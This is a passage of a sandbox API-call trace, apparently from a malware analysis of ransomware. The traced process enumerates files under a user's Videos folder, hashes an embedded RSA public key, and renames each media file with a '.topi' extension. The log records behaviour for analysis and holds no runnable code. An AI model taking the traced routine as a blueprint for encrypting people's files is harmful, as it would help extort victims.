returned 1 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.942] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\") returned="sAsxhx217z\\" [0097.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317eb10 [0097.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.942] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\") returned="z4k8sZRNNGS3Ve7W-\\" [0097.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0097.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0097.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317eb10 | out: hHeap=0x680000) returned 1 [0097.942] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\") returned="Yo5RRMrTBRvZPTzk\\" [0097.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb988 [0097.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31621a8 | out: hHeap=0x680000) returned 1 [0097.942] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0097.942] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbba8 [0097.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.942] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.943] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.943] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbba8 | out: hHeap=0x680000) returned 1 [0097.943] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.943] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.943] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.943] PathFindFileNameW (pszPath="") returned="" [0097.943] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.943] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f509fd0, ftCreationTime.dwHighDateTime=0x1d5b776, ftLastAccessTime.dwLowDateTime=0x56490d40, ftLastAccessTime.dwHighDateTime=0x1d5c602, ftLastWriteTime.dwLowDateTime=0x56490d40, ftLastWriteTime.dwHighDateTime=0x1d5c602, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0097.943] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.943] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f509fd0, ftCreationTime.dwHighDateTime=0x1d5b776, ftLastAccessTime.dwLowDateTime=0x56490d40, ftLastAccessTime.dwHighDateTime=0x1d5c602, ftLastWriteTime.dwLowDateTime=0x56490d40, ftLastWriteTime.dwHighDateTime=0x1d5c602, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.943] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38fc4ed0, ftCreationTime.dwHighDateTime=0x1d5c271, ftLastAccessTime.dwLowDateTime=0xbae8ad70, ftLastAccessTime.dwHighDateTime=0x1d5c4c5, ftLastWriteTime.dwLowDateTime=0xbae8ad70, ftLastWriteTime.dwHighDateTime=0x1d5c4c5, nFileSizeHigh=0x0, nFileSizeLow=0x9aa7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DJjeoysO.flv", cAlternateFileName="")) returned 1 [0097.943] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.943] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x106) returned 0x31919a8 [0097.943] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.943] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\DJjeoysO.flv") returned=".flv" [0097.944] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\DJjeoysO.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\djjeoyso.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.944] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=39591) returned 1 [0097.944] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.947] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x9a81, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.947] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.948] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.948] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x9aa7, lpOverlapped=0x0) returned 1 [0097.948] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.948] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.948] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.948] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.949] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.949] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.949] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.949] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.949] GetLastError () returned 0x0 [0097.949] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.949] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.949] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.950] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.950] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9ab0) returned 0x9a06a00 [0097.950] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.951] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\DJjeoysO.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\djjeoyso.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\DJjeoysO.flv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\djjeoyso.flv.topi")) returned 1 [0097.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.952] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.953] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa506f20, ftCreationTime.dwHighDateTime=0x1d5bf75, ftLastAccessTime.dwLowDateTime=0x60d36590, ftLastAccessTime.dwHighDateTime=0x1d5be22, ftLastWriteTime.dwLowDateTime=0x60d36590, ftLastWriteTime.dwHighDateTime=0x1d5be22, nFileSizeHigh=0x0, nFileSizeLow=0x60a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G7Fo.avi", cAlternateFileName="")) returned 1 [0097.953] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\G7Fo.avi") returned=".avi" [0097.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\G7Fo.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\g7fo.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.953] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=24740) returned 1 [0097.953] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.956] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x607e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.956] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.957] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.958] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.958] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.958] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.958] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.958] GetLastError () returned 0x0 [0097.958] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.958] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.958] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.958] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.958] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.958] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.958] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.958] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60a0) returned 0x99fc2d8 [0097.958] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbbf0 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5048 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbc38 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5060 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5090 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50a8 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.959] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.959] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5090 | out: hHeap=0x680000) returned 1 [0097.959] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50a8 | out: hHeap=0x680000) returned 1 [0097.959] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.959] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.959] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: 